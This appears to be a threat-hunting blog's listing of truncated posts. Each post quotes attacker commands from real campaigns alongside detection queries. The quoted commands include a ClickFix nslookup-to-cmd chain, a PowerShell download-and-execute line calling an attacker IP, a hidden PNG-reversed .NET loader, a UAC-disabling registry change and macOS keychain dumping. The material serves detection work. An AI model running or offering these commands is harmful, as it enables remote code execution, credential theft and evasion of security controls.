Posts

375. The New ClickFix Variant: Do We Really Need To Detect It?

Hello everyone! Variants of the Malicious Copy and Paste technique (T1204.004) remain popular among attackers. Today, we’ll look at another example and examine whether it actually affects our detection capabilities. This particular variant was shared by researchers from Microsoft Threat Intelligence. The command that the victim is prompted to execute performs a DNS query to an attacker-controlled server and parses the Name: field from the response:

cmd /c "nslookup example.com 84.21.189[.]20 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit

Despite the originality of the approach, the Name: field contains a fairly ordinary command:

powershell.exe -ep bypass -w h -c "iwr hxxp://64.227.40[.]197/o -useb | iex"

As you can see, there is nothing particularly novel here, and you could search for similar activity, for example, like this:

event_type: "processcreatewin" AND...

374. Hunting for Suspicious Service Stopping Events

Hello everyone! Today we’ll take a look at the Service Stop technique (T1489) and discuss whether it’s worth hunting for its implementation. This technique is a typical behavioral marker for ransomware and wipers. If you check ATT&CK, you’ll see plenty of examples. Typically, such malware is used at the very end of the cyberattack lifecycle and is hardly a good target for proactive threat hunting. However, there are always exceptions. Let’s take a look at the Prometei botnet. During the malware installation process, it stops the WinRM service and then disables it:

sc stop WinRM
sc config WinRM start= disabled

Why is this done? For example, it makes remote administration more difficult. Could such activity be legitimate? Of course! Therefore, this behavioral marker can be a reasonable target for proactive hunting:

event_type: "processcreatewin" AND proc_file_path: "sc.exe" AND cmdline: ("winrm" AND "disabled")

See you soon!

373. Adversaries Keep Abusing Legitimate Cloud Infrastructure, But You Can Hunt For It!

Hello everyone! The abuse of legitimate cloud services keeps appearing in public cyber threat research reports, so today we’ll look at a couple of examples related both to malware distribution and data exfiltration. The first example is a loader from this report. In this case, the attackers abuse PowerShell to download an image containing malicious code from cloudinary[.]com:

hxxps://res[.]cloudinary[.]com/dbjtzqp4q/image/upload/v1767455040/optimized_MSI_lpsd9p.jpg

We can search for suspicious PowerShell interactions with cloudinary[.]com:

event_type: "dnsreqwin" AND dns_rname: "cloudinary.com" AND proc_file_path: "powershell.exe"

Another example is Muddled Libra. The attackers attempted to use several legitimate services for data exfiltration:

upload[.]ee
uploadnow[.]io
filetransfer[.]io
filebin[.]io

Suspicious communications with these services can also be searched for:

event_type: "dnsreq" AN...

372. The Notepad++ Supply Chain Attack: Detection and Hunting Opportunities

Hello everyone! Today we’ll talk about a supply-chain attack related to Notepad++ and look at whether it was possible to detect the artifacts of compromise associated with it. Let’s take a look at the Kaspersky Lab report dedicated to this attack. The first thing that caught my attention is that, once again, the attackers executed a large number of commands to collect information about the compromised system, for example:

cmd /c whoami >> a.txt
cmd /c tasklist >> a.txt
cmd /c systeminfo >> a.txt
cmd /c netstat -ano >> a.txt

Yes, hunting for this kind of behavioral marker will generate a lot of “noise,” but if you know your infrastructure well, it can absolutely be worked with:

event_type: "processcreatewin" AND proc_p_file_path: "cmd.exe" AND cmdline: (*whoami* OR *tasklist* OR *systeminfo* OR *netstat*)

Next, the attackers once again abused cURL, and this time they also used a rather suspicious web service - temp[.]sh:

curl.exe -F ...

371. Adversaries Disguise Malicious Files as PNG Images

Hello everyone! Today we’ll look at another interesting example of implementing one of my favorite techniques for proactive hunting - Command and Scripting Interpreter: PowerShell (T1059.001). This example is related to the distribution of the SHEETCREEP backdoor. The attackers distributed ZIP archives that contained two files: an LNK and a PNG. Opening the LNK file executed the following command:

powershell.exe -WindowStyle Hidden -Command "$b=[IO.File]::ReadAllBytes('details.png');([System.Reflection.Assembly]::Load([byte[]]($b[($b.Length-1)..0])).GetType(\"Task10.Program\")::MB())"

The command reads the bytes of the PNG file, reverses them, and loads the result as a .NET assembly. What can we hunt for? For example, PowerShell reading bytes from suspicious files, in particular PNG files (of course, you can extend this list):

event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: (*ReadAllBytes* AND *png*)

See yo...

370. Adversaries Disable UAC Prompts for Administrator Accounts

Hello everyone! Today we’re going to look at another interesting example of the Modify Registry (T1112) technique, this time in the context of the Defense Evasion tactic. Today’s example comes from an activity cluster known as KONNI. The malware used by the attacker modified the following registry value:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin

This value defines how Windows requests confirmation for privilege elevation for administrators. Of course, the attackers change it to “0”, which allows privilege elevation to occur without any confirmation prompt. Therefore, it may be a good idea to look for suspicious events related to modification of this value:

event_type: "registryvaluesetwin" AND reg_key_path: "consentpromptbehavioradmin" AND reg_value_data: "0x00000000"

By the way, the report we’re discussing is yet another example of how attackers are abusing AI to develop malware and tools! ...

369. Here's How MonetaStealer Abuses macOS "Security"

Hello everyone! It’s been a while since we last talked about macOS, so it’s high time to fix that. Today, we’ll look at an example of implementing the technique Credentials from Password Stores: Keychain (T1555.001). As before, our focus is on real-world threats, and as an example we’ll examine MonetaStealer. This malware actively abuses the built-in macOS security utility, which is designed to work with the macOS security subsystem - primarily the Keychain, certificates, passwords, and access control policies. For example, the stealer abuses this utility to obtain the key used to decrypt passwords saved in Google Chrome:

security find-generic-password -w -a "Chrome"

The utility is also used to dump the Keychain and search the output for specific keywords:

security dump-keychain 2>/dev/null | grep -i {keyword} | head -20

Both examples can be good targets for hunting (or even detection):

event_type: "processcreatemac" AND proc_file_path: "security" AND...